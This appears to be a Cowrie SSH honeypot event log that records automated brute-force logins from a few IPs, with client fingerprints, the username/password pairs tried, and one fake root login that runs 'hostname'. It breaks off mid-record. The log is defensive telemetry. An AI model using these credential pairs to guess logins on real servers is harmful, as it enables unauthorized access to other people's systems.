{"eventid":"cowrie.login.failed","username":"zabbix","password":"root123","message":"login attempt [zabbix/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:19:51.832154Z","src_ip":"212.227.235.229","session":"139481cce198"}
{"eventid":"cowrie.login.success","username":"root","password":"capitaltruck2021","message":"login attempt [root/capitaltruck2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:19:51.985058Z","src_ip":"201.148.180.50","session":"dfa58e7b145b"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:19:54.141428Z","src_ip":"212.227.235.229","session":"139481cce198"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:19:54.893604Z","src_ip":"201.148.180.50","session":"dfa58e7b145b"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T07:19:54.894375Z","src_ip":"201.148.180.50","session":"dfa58e7b145b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:19:56.402292Z","src_ip":"201.148.180.50","session":"dfa58e7b145b"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:19:56.403483Z","src_ip":"201.148.180.50","session":"dfa58e7b145b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48300,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b46322e6be7","protocol":"ssh","message":"New connection: 212.227.125.160:48300 (1.2.3.4:22) [session: 7b46322e6be7]","sensor":"my-vps","timestamp":"2025-08-31T07:19:56.594687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T07:19:56.595559Z","src_ip":"212.227.125.160","session":"7b46322e6be7"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T07:19:56.675731Z","src_ip":"212.227.125.160","session":"7b46322e6be7"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T07:19:57.105371Z","src_ip":"212.227.125.160","session":"7b46322e6be7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:19:58.187963Z","src_ip":"212.227.125.160","session":"7b46322e6be7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33624,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6a33c0251e7","protocol":"ssh","message":"New connection: 212.227.125.160:33624 (1.2.3.4:22) [session: b6a33c0251e7]","sensor":"my-vps","timestamp":"2025-08-31T07:20:06.800965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:20:07.363373Z","src_ip":"212.227.125.160","session":"b6a33c0251e7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:20:07.364094Z","src_ip":"212.227.125.160","session":"b6a33c0251e7"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"root123","message":"login attempt [zabbix/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:20:09.741024Z","src_ip":"212.227.125.160","session":"b6a33c0251e7"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:20:11.217036Z","src_ip":"212.227.125.160","session":"b6a33c0251e7"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":51348,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffcef771f395","protocol":"ssh","message":"New connection: 102.210.148.92:51348 (1.2.3.4:22) [session: ffcef771f395]","sensor":"my-vps","timestamp":"2025-08-31T07:20:25.665692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:20:25.666614Z","src_ip":"102.210.148.92","session":"ffcef771f395"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:20:25.842923Z","src_ip":"102.210.148.92","session":"ffcef771f395"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123@qwe","message":"login attempt [admin/123@qwe] failed","sensor":"my-vps","timestamp":"2025-08-31T07:20:26.592557Z","src_ip":"102.210.148.92","session":"ffcef771f395"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:20:27.772100Z","src_ip":"102.210.148.92","session":"ffcef771f395"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50012,"dst_ip":"1.2.3.4","dst_port":22,"session":"cea7c21233aa","protocol":"ssh","message":"New connection: 212.227.235.229:50012 (1.2.3.4:22) [session: cea7c21233aa]","sensor":"my-vps","timestamp":"2025-08-31T07:20:45.698741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:20:46.937411Z","src_ip":"212.227.235.229","session":"cea7c21233aa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:20:46.938205Z","src_ip":"212.227.235.229","session":"cea7c21233aa"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"P@ssw0rd123","message":"login attempt [zabbix/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:20:52.534190Z","src_ip":"212.227.235.229","session":"cea7c21233aa"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:20:54.314771Z","src_ip":"212.227.235.229","session":"cea7c21233aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39692,"dst_ip":"1.2.3.4","dst_port":22,"session":"74d774991337","protocol":"ssh","message":"New connection: 212.227.125.160:39692 (1.2.3.4:22) [session: 74d774991337]","sensor":"my-vps","timestamp":"2025-08-31T07:21:07.209812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:21:07.673485Z","src_ip":"212.227.125.160","session":"74d774991337"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:21:07.674199Z","src_ip":"212.227.125.160","session":"74d774991337"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"P@ssw0rd123","message":"login attempt [zabbix/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:21:10.556690Z","src_ip":"212.227.125.160","session":"74d774991337"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:21:12.183668Z","src_ip":"212.227.125.160","session":"74d774991337"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":42500,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed37bfa9e7c0","protocol":"ssh","message":"New connection: 102.210.148.92:42500 (1.2.3.4:22) [session: ed37bfa9e7c0]","sensor":"my-vps","timestamp":"2025-08-31T07:21:38.245169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:21:38.246115Z","src_ip":"102.210.148.92","session":"ed37bfa9e7c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:21:38.422284Z","src_ip":"102.210.148.92","session":"ed37bfa9e7c0"}
{"eventid":"cowrie.login.failed","username":"middleware","password":"123654","message":"login attempt [middleware/123654] failed","sensor":"my-vps","timestamp":"2025-08-31T07:21:39.160609Z","src_ip":"102.210.148.92","session":"ed37bfa9e7c0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:21:40.338187Z","src_ip":"102.210.148.92","session":"ed37bfa9e7c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55098,"dst_ip":"1.2.3.4","dst_port":22,"session":"17b1cfb2d884","protocol":"ssh","message":"New connection: 212.227.235.229:55098 (1.2.3.4:22) [session: 17b1cfb2d884]","sensor":"my-vps","timestamp":"2025-08-31T07:21:45.687716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:21:46.400293Z","src_ip":"212.227.235.229","session":"17b1cfb2d884"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:21:46.401131Z","src_ip":"212.227.235.229","session":"17b1cfb2d884"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"letmein","message":"login attempt [zabbix/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T07:21:52.426527Z","src_ip":"212.227.235.229","session":"17b1cfb2d884"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:21:54.203699Z","src_ip":"212.227.235.229","session":"17b1cfb2d884"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45342,"dst_ip":"1.2.3.4","dst_port":22,"session":"942abb44ecf5","protocol":"ssh","message":"New connection: 212.227.125.160:45342 (1.2.3.4:22) [session: 942abb44ecf5]","sensor":"my-vps","timestamp":"2025-08-31T07:22:07.208386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:22:07.651321Z","src_ip":"212.227.125.160","session":"942abb44ecf5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:22:07.652020Z","src_ip":"212.227.125.160","session":"942abb44ecf5"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"letmein","message":"login attempt [zabbix/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T07:22:09.532961Z","src_ip":"212.227.125.160","session":"942abb44ecf5"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:22:11.047586Z","src_ip":"212.227.125.160","session":"942abb44ecf5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33820,"dst_ip":"1.2.3.4","dst_port":22,"session":"1302197ab9ea","protocol":"ssh","message":"New connection: 212.227.235.229:33820 (1.2.3.4:22) [session: 1302197ab9ea]","sensor":"my-vps","timestamp":"2025-08-31T07:22:45.297354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:22:46.563435Z","src_ip":"212.227.235.229","session":"1302197ab9ea"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:22:46.564365Z","src_ip":"212.227.235.229","session":"1302197ab9ea"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"welcome","message":"login attempt [zabbix/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T07:22:52.331144Z","src_ip":"212.227.235.229","session":"1302197ab9ea"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":49256,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a1c230da113","protocol":"ssh","message":"New connection: 102.210.148.92:49256 (1.2.3.4:22) [session: 5a1c230da113]","sensor":"my-vps","timestamp":"2025-08-31T07:22:53.535621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:22:53.536488Z","src_ip":"102.210.148.92","session":"5a1c230da113"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512